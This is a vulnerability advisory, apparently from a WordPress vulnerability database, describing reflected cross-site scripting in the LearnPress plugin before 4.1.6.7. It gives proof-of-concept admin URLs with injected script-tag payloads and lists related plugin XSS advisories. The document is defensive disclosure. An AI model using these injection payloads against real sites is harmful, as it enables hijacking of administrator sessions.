LearnPress < 4.1.6.7 – Reflected Cross-Site Scripting | Plugin Vulnerabilities

Description

The plugin does not escape some URLs before outputting them back in attributes, leading to Reflected Cross-Site Scripting

Proof of Concept

Fixed in 4.1.6.6 - https://example.com/wp-admin/admin.php?page=learn-press-settings&tab=emails&section=new-order-emails&a"><script>alert(/XSS/)</script>

Fixed in 4.1.6.7 - With a lesson attached to the course id 2431: https://example.com/wp-admin/edit.php?post_type=lp_lesson&course=2431&a"><script>alert(/XSS/)</script>

Other pages are also affected

Affects Plugins

Fixed in 4.1.6.7

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

WPScanTeam

Verified

Yes

WPVDB ID

d82de28b-1f2f-4a51-b3cb-2ff3ceb7c720

Timeline

Publicly Published

2022-06-22 (about 3 years ago)

Added

2022-06-22 (about 3 years ago)

Last Updated

2022-06-22 (about 3 years ago)

Other

Published

Title

Published

2023-10-02

Title

Click To Tweet <= 2.0.14 - Reflected XSS

Published

2024-10-22

Title

RSS Feed Widget < 3.0.0 - Contributor+ Stored XSS

Published

2025-01-07

Title

Better User Shortcodes <= 1.0 - Reflected Cross-Site Scripting

Published

2025-04-14

Title

T&P Gallery Slider <= 1.2 - Unauthenticated Stored Cross-Site Scripting

Published

2022-01-17

Title

Permalink Manager < 2.2.15 - Reflected Cross-Site Scripting